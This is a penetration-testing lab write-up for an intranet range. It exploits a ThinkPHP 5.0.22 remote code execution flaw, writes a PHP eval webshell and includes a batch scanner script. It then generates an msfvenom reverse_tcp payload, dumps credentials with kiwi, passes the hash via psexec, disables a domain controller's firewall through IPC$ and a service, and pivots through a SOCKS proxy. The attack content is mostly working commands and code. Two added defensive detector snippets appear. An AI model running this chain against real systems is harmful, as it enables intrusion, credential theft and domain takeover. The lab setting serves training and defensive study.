Preface

The way of thinking is the most important part of intranet penetration. Although this range does not have many hosts, the main purpose is to practise the thought process of intranet penetration.
Lab environment:

- Windows 7 (inner):
- Windows 7 (f):
- Hosts in the domain:
Web server penetration

Probe the ports with Nmap (the target address is not preserved in this copy):

```
nmap -T4 -sC -sV <target>
```

Several important ports are visible: 80, 135, 139 and 445. The first thing that comes to mind is that 139/445 can be used for IPC$ and SMB.
Port 80 is open. Visiting the site shows the familiar ThinkPHP smiley page, and it is still a 5.x version, which has plenty of known vulnerabilities.
To determine the exact version, we first trigger an error page and find that the version is 5.0.22. If I remember correctly, this version has a ThinkPHP remote command execution vulnerability.
Vulnerability description: ThinkPHP's core Request class implements request-method forgery in its method() function, using $_POST['_method'] to carry the actual request method. Because the framework does not validate that parameter, an attacker can set $_POST['_method']='__construct' and thereby overwrite variables of that class. In this way the attacker overwrites the filter variable with a function name such as system, and when parameters are later passed through the filter, arbitrary commands are executed.
ThinkPHP GetShell
```
searchsploit thinkphp
```
You can see that there is a 5.x remote code execution entry, so go straight to that folder and look at the payloads listed in the text file:

```
cd /usr/share/exploitdb/exploits/php/webapps
cat 46150.txt
```
Fuzz with the payloads listed for the matching version:

```
/thinkphp/public/?s=.|think\config/get&name=database.username
```

This payload should return the database password, but it produced no output here:

```
/thinkphp/public/?s=.|think\config/get&name=database.password
```
Call phpinfo:

```
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
```

The current user is Administrator:

```
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
```

Check the IP configuration: there are two network adapters, so there is most likely a domain environment:

```
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ipconfig
```

Check the process list: no antivirus is found, so a webshell can be written directly without any evasion:

```
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tasklist /svc
```

Here I simply use echo to write a one-line webshell. Because the previous check showed no antivirus or Safedog, no evasion is needed:

```
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[cmd]);?>" > connect.php
```

Use dir to verify that the file was written:

```
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
```
The connection succeeds using AntSword.
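From the defender's side, the request shapes used above are easy to spot in web-server access logs. The following Python snippet is an added example (not code from the original post): it scans constructed access-log lines for the ThinkPHP 5 invokefunction, config-disclosure and dangerous-callback patterns, URL-decoding the request target so that encoded variants are also caught. The log lines, IPs and rule names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not taken from the original post); requests
# mirror the ThinkPHP 5 payload shapes above, one of them URL-encoded.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /thinkphp/public/?s=.|think\config/get&name=database.password HTTP/1.1" 200 88
10.0.0.7 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?s=index/user/login HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 HTTP/1.1" 200 9000
'''

# One regex per request shape; the rule names are this example's own labels.
RULES = [
    ("tp5-invokefunction-rce", re.compile(r"think\\app/invokefunction", re.I)),
    ("tp5-config-disclosure", re.compile(r"think\\config/get", re.I)),
    ("tp5-dangerous-callback",
     re.compile(r"vars\[0\]=(?:system|phpinfo|assert|eval|exec|shell_exec|passthru)\b", re.I)),
]

# Common log format: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def scan_log(text):
    """Return one finding per log line whose decoded request target matches a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode %5C, %5B ... so encoded variants of the same payload are caught.
        target = unquote(m.group("target"))
        matched = [name for name, rx in RULES if rx.search(target)]
        if matched:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "rules": matched, "request": target})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["time"], ",".join(f["rules"]), f["request"])
```

The same rules can be fed to a log shipper or SIEM; the decoding step matters because the backslashes and brackets in these payloads are often percent-encoded by clients.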
There are many versions of ThinkPHP. If Kali does not have an entry in its exploit database, and searching the web for each one is too time-consuming, is there a script for batch detection of ThinkPHP vulnerabilities?
Here is a script I found for batch detection of ThinkPHP vulnerabilities:
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Name: ThinkPHP remote code detection
# Description: ThinkPHP5 5.0.22/5.1.29 remote code execution vulnerability

import queue
import threading

import requests
from bs4 import BeautifulSoup


class thinkphp_rce(threading.Thread):
    def __init__(self, q):
        threading.Thread.__init__(self)
        self.q = q

    def run(self):
        while not self.q.empty():
            url = self.q.get()
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
                                     "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"}
            payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
            vulnurl = url + payload
            try:
                response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False)
                soup = BeautifulSoup(response.text, "lxml")
                # A phpinfo page in the response means the call went through.
                if 'PHP Version' in str(soup.text):
                    print('[+] Remote code execution vulnerability exists at the target address')
                    print('[+] Vulnerable url: ' + vulnurl)
                    with open('target.txt', 'a') as f1:
                        f1.write(vulnurl + '\n')
                else:
                    print('[-] There is no remote code execution vulnerability in the target address')
            except Exception:
                print('[!] Destination address cannot be connected')


def urlget():
    # Read targets from url.txt, prefixing http:// where no scheme is given.
    with open('url.txt', 'r') as f:
        urls = f.readlines()
    for tmp in urls:
        if '//' in tmp:
            url = tmp.strip('\n')
        else:
            url = 'http://' + tmp.strip('\n')
        urlList.append(url)
    return urlList


if __name__ == "__main__":
    print('---------------- scanning start ----------------')
    print('*Made by :tdcoming *For More *MY Heart')
    urlList = []
    urlget()
    threads = []
    threads_count = 10
    q = queue.Queue()
    for url in urlList:
        q.put(url)
    for i in range(threads_count):
        threads.append(thinkphp_rce(q))
    for i in threads:
        i.start()
    for i in threads:
        i.join()
```
Usage is very simple: put the targets to be checked in url.txt; any address found vulnerable is automatically saved to target.txt.
Collect intranet information

Use AntSword's command window to collect local information: we have administrator permission and two network adapters.
View domain information:

```
net view
net config workstation
net user /domain
```
Intranet penetration: bringing the host online in MSF

Generate abc.exe with msfvenom (the LHOST value is not preserved in this copy):

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f exe > abc.exe
```

Upload it to the target with AntSword.
Because there is no antivirus, no evasion is needed; simply execute it from the command line.
Start the MSF listener and the host comes online.
Information gathering

Use getsystem to escalate to SYSTEM. Here getsystem succeeds easily because this is a practice range.
Get a Windows shell and continue collecting domain information:

```
chcp 65001
net user /domain
net group "domain computers" /domain
net group "domain controllers" /domain
net group "domain admins" /domain
```

The target has a domain environment named "Sun" with only one domain controller. I ping the domain controller directly to obtain its IP address.
Obtaining credentials

Since there are two network segments, add routes to make the following steps easier (the subnet values are not preserved in this copy):

```
# in MSF
route add <subnet> <netmask> 2
route print
# in the session
run autoroute -s <subnet>
run autoroute -p
```
Select the session and use kiwi to obtain the target machine's passwords. Note that one extra step is needed here: process migration. The payload we brought online in MSF is 32-bit (x86), so we need to find a 64-bit (x64) process and migrate into it before kiwi can dump the passwords.

```
sessions -i 2
load kiwi
kiwi_cmd privilege::debug
ps
migrate 1144
kiwi_cmd sekurlsa::logonPasswords
```

Here we can see that the passwords of a domain admin and of the target machine were captured.
Since we have the target machine's and the domain admin's passwords, the first option is to use pass-the-hash (PTH) for lateral movement. A second option is to check which vulnerabilities the machine in the other network segment has, such as MS17-010 or CVE-2020-0796, and move laterally with the corresponding exploit. Finally, since the earlier Nmap scan found ports 139 and 445, once we have the password we can try to move laterally with an IPC$ connection plus a scheduled task.
Intranet lateral movement: MS17-010

First, try the MS17-010 exploit module directly. Strictly speaking, the scanner module should be run first against the host in the other network segment, and the exploit module used only if it reports the EternalBlue vulnerability; for convenience of demonstration I use the exploit module straight away.
The attack shows that although the target has the EternalBlue vulnerability, no session came back, because anonymous pipes are not enabled by default on Windows Server 2008.
We know that psexec works through pipes, and the same is true of IPC connections, so the EternalBlue connection cannot be established when anonymous pipes are disabled. Here is the concept of anonymous pipes:
Pipes are the most basic mechanism for implementing IPC. Under Linux "everything is a file", and a pipe is also a file. The pipe enables process communication by giving both processes access to that file.
(1) If process 1 writes to the file, process 2 can only read the contents of the file.
(2) It can only be used for communication between related processes, usually a parent and its child.
(3) The pipe communicates as a byte stream.
(4) It depends on the file system, and its life cycle ends with the process.
(5) It has its own synchronisation and mutual-exclusion behaviour.
Psexec attempt

Since we already have a domain account, we use PTH (pass-the-hash) directly through the psexec module. This module is heavily used and therefore widely blacklisted; if antivirus were present it would block the psexec lateral movement.
The parameters are set as shown below. Note that SMBPass accepts either a hash or a plain-text password (the rhost value is not preserved in this copy):

```
use exploit/windows/smb/psexec
set rhost <dc-ip>
set SMBDomain SUN
set SMBUser administrator
set SMBPass dc123.com
set payload windows/meterpreter/bind_tcp
run
```
We can see that the exploit ran but no session came back. I guess the firewall is blocking the port traffic, so we need to turn off the domain controller's firewall through an IPC connection.

IPC connection to turn off the domain controller firewall

The normal way is to turn off the firewall with netsh, but that requires domain administrator permission on the domain controller, so instead we make an IPC connection to the domain controller and then use a scheduled task to turn off the firewall.

```
netsh advfirewall firewall add rule name="f.exe" dir=in program="e:\f.exe" action=allow
netsh advfirewall firewall delete rule name="f.exe"
```

Send the session to the background and establish an IPC connection with the domain controller (the address and password are not preserved in this copy):

```
net use \\<dc-ip>\ipc$ <password> /user:administrator
```

The connection is established successfully. Create a service with sc, start it immediately, and disable the domain controller's firewall:

```
sc \\<dc-ip> create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\<dc-ip> start unablefirewall
```
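On the defender's side, the trick above leaves a clear trace: a service whose binary path is a netsh command rather than an executable. The following Python snippet is an added example (not the post's own code) that checks constructed records shaped like Windows System-log Event ID 7045 ("A service was installed in the system") for a firewall-disabling or rule-adding netsh command in the ImagePath, and for any shell command used as a service path. Hostnames, service names and the records themselves are constructed.

```python
import re

# Constructed records shaped like Event ID 7045 fields; hostnames and paths are made up.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "DC01.sun.local", "ServiceName": "unablefirewall",
     "ImagePath": "netsh advfirewall set allprofiles state off",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WS01.sun.local", "ServiceName": "allowtool",
     "ImagePath": 'cmd /c netsh advfirewall firewall add rule name="f.exe" dir=in program="e:\\f.exe" action=allow',
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "WS01.sun.local", "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "Computer": "WS01.sun.local", "ServiceName": "Spooler",
     "ImagePath": "", "StartType": "", "AccountName": ""},
]

# Rule names are this example's own labels.
RULES = [
    ("firewall-disabled", re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("firewall-rule-added", re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", re.I)),
    # A service whose path is a shell command instead of a .exe/.sys file is
    # itself suspicious: sc's binpath= is being used to run a one-off command.
    ("command-as-binpath",
     re.compile(r"^(?:cmd(?:\.exe)?|powershell(?:\.exe)?|netsh(?:\.exe)?)\b", re.I)),
]


def detect_service_firewall_tampering(events):
    """Return one finding per 7045 event whose ImagePath matches any rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:          # only service-installed events
            continue
        path = ev.get("ImagePath", "")
        matched = [name for name, rx in RULES if rx.search(path)]
        if matched:
            findings.append({"host": ev["Computer"], "service": ev["ServiceName"],
                             "rules": matched, "image_path": path})
    return findings


if __name__ == "__main__":
    for f in detect_service_firewall_tampering(SAMPLE_EVENTS):
        print(f["host"], f["service"], ",".join(f["rules"]), f["image_path"])
```

Correlating the 7045 event with the preceding remote IPC$ logon to the same host gives the full picture of the sequence described above.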
We can see that the firewall has been turned off.

Psexec attempt 2

Now move laterally with psexec again and a session comes back, so we have control of the domain controller.
What we get directly is a session with SYSTEM privileges.
I want to log in to the domain controller's remote desktop to see what else of value is there, so I use a SOCKS proxy to reach the intranet through a forward proxy.
Use the socks_proxy module:

```
use auxiliary/server/socks_proxy
set VERSION 4a
run
```

The proxychains configuration file needs an entry for the proxy (the host value is not preserved in this copy):

```
socks4 <msf-host> 1080
```

Add a route to the intranet network segment:

```
run autoroute -s <subnet>
run autoroute -p
```

Then log in to the remote desktop through proxychains:

```
proxychains4 rdesktop <dc-ip>
```